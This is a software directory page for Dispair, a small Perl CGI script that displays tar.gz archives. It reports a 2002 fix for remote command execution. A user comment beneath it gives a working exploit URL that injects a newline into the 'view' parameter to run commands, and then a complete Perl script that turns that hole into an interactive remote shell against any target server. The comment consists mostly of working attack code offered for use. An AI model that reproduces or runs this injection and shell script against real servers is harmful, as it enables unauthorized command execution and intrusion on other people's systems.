Projects / Dispair

Dispair

Dispair (DISPlay Archives In Realtime) is a tiny CGI-script written in Perl that lets users browse tar.gz archives.

Tags
Licenses
Operating Systems
Implementation

Recent releases

  •  31 Jul 2002 23:29

    Release Notes: A remote command execution exploit was fixed.

    Recent comments

    30 Jul 2002 16:47 404

    remote command execution exploit
    http://target/cgi-bin/dispair.cgi?file=fiddle&view=%0A/usr/bin/id

    Here is a perl script that provides a shell-like interface:

    #!/usr/bin/perl

    use strict;
    use IO::Socket;

    my $target = shift || die "usage: $0 <targetserver>";
    my $cmd = '';

    while ($cmd ne 'exit') {
    print ">> "; $cmd = <STDIN>; chomp $cmd;
    $cmd =~ s/ /%20/g;
    my $socket = IO::Socket::INET->new(PeerAddr => $target, PeerPort => 'http(80)', Proto => 'tcp');
    print $socket "GET /cgi-bin/dispair.cgi?file=fiddle&view=%0A$cmd HTTP/1.0\n";
    print $socket "Host: $target\n";
    print $socket "USER-AGENT: scriptkiddie\n\n";
    while (<$socket>) { last if ($_ =~ m/^\r/); }
    while (<$socket>) { print; }
    close $socket;
    }

    Screenshot

    Project Spotlight

    OpenStack4j

    A Fluent OpenStack client API for Java.

    Screenshot

    Project Spotlight

    TurnKey TWiki Appliance

    A TWiki appliance that is easy to use and lightweight.